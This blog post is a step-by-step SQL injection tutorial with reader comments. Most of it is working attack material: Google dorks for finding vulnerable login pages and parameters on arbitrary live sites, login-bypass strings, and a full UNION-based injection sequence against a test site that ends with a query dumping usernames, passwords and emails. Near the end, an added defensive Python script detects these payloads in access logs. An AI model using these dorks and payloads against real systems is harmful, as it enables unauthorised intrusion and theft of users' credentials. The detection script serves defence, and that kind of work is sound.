
Another SQL Injection Tutorial

These days when I'm doing penetration testing, I normally use automated SQL injection tools because it's much easier and faster. Even in my previous post I only mentioned these automated tools. However, I got a request from myHAC to write a step-by-step tutorial on SQL injection. I thought this could be a refresher for me and a way for other people to understand the underlying process behind the automated SQL injection tools. So here it goes.

What is SQL injection?
SQL (Structured Query Language) injection is an attack technique that exploits a vulnerability in a web application that communicates with the server's database. The attack succeeds when the application fails to validate user-supplied input used in the SQL statements it sends to the database, thereby allowing the attacker to gain control of all database resources.

Basic SQL Injection
The basic SQL injection attack is to bypass the login screen. Search for an admin login page using the following dorks (there are many more, but I just want to keep this simple):

inurl:admin.asp
inurl:login.asp

Now that we have found the admin login page, we enter one of the following strings into the username and password text boxes. Commonly used SQL injection strings:

' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
and many more :)


Advanced SQL Injection
We need to find websites that are vulnerable to the attack. To do this we can use the following dorks:

inurl:index.php?catid=
inurl:index.php?id=
inurl:article.php?ID=
inurl:pageid=
inurl:page.php?file=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=

Step 1
Check whether the page is vulnerable to SQL injection or not. To do this, just add a ' (apostrophe) at the end of the URL.

http://testphp.vulnweb.com/listproducts.php?cat=1'


If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():


Step 2
Once you find a vulnerable site, you need to enumerate the number of columns and find which of those columns accept your queries.

Append an 'order by' statement to the URL.
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--

Keep increasing the number after order by until you get an error. The highest number for which you do not get an error is the number of columns in the table. We got an error at 12, so the number of columns is 11.

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3--
----
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--


Step 3
Now we need to find the vulnerable columns by using the UNION operator. Also precede the number after the parameter ("cat=" in this example) with a hyphen or minus (-). From the step above, we know that the table has 11 columns.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11

The result of this query will be the numbers of the columns that accept queries, in this case 2 and 7. Now we'll inject our SQL statements into one of these columns.


Step 4
We'll use the MySQL variable @@version to get the version of the database. We have to inject it into one of the open columns. We know columns 2 and 7 are vulnerable. Say we use column number 7.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union all select 1,2,3,4,5,6,@@version,8,9,10,11

You'll get the version of the database in the place where you got the number 7 in step 3.


Note: if you get version 4 then it will be a bit difficult because we have to guess the tables and columns.

Step 5
Now we try to get the list of databases on the site.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11 from information_schema.schemata--


To know the current database in use:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(database()),3,4,5,6,7,8,9,10,11--


To get the current user:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(user()),3,4,5,6,7,8,9,10,11--


To get the tables:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables where table_schema=database()--


http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()--


To get the columns:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database()--


To get the list of users:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11 from users


Note: 0x3a is the colon to separate the result.
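
Seen from the defending side, steps 1 to 5 leave a recognizable sequence in the web server's access log. The following added example (not part of the original post) flags those request patterns; the log lines are constructed, and the rule names and function are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /listproducts.php?cat=1' HTTP/1.1" 200 310
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /listproducts.php?cat=1%20order%20by%2012-- HTTP/1.1" 200 298
198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /listproducts.php?cat=-1+union+select+1,concat(database()),3-- HTTP/1.1" 200 4012
198.51.100.7 - - [01/Jan/2024:10:00:21 +0000] "GET /listproducts.php?cat=-1%20UNION%20SELECT%201,group_concat(table_name)%20from%20information_schema.tables-- HTTP/1.1" 200 4400
192.0.2.10 - - [01/Jan/2024:10:00:30 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 2048
"""

# One rule per step of the tutorial, applied to the URL-decoded query string.
RULES = [
    ("quote-probe", re.compile(r"'(?:&|$)")),                  # step 1
    ("order-by-count", re.compile(r"\border\s+by\s+\d+", re.I)),  # step 2
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),  # step 3
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),  # step 5
    ("db-fingerprint", re.compile(r"@@version|\b(?:database|user)\s*\(\s*\)", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan(log_text):
    """Return (client_ip, path, [rule names]) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        path, _, query = target.partition("?")
        decoded = unquote_plus(query)  # handles both %20 and + as spaces
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            findings.append((ip, path, hits))
    return findings

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ",".join(hits))
```

A single client tripping several of these rules against the same parameter within seconds is the step-by-step enumeration described above, and is a stronger signal than any one rule alone.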

4 comments:

HAW said...

Ouch! So hard to understand.. and it's long too

dgodam said...

The basic SQL injection part is short.. it's the advanced part that's long-winded, for myHAC to read...huhuh

bizVM said...

thanks a lot bro. so useful info :)
http://bizvm.blogspot.com

Muhammad Azeem said...

This is a nice article..
It's very easy to understand ..
And this article is using to learn something about it..

c#, dot.net, php tutorial, Ms sql server

Thanks a lot..!

 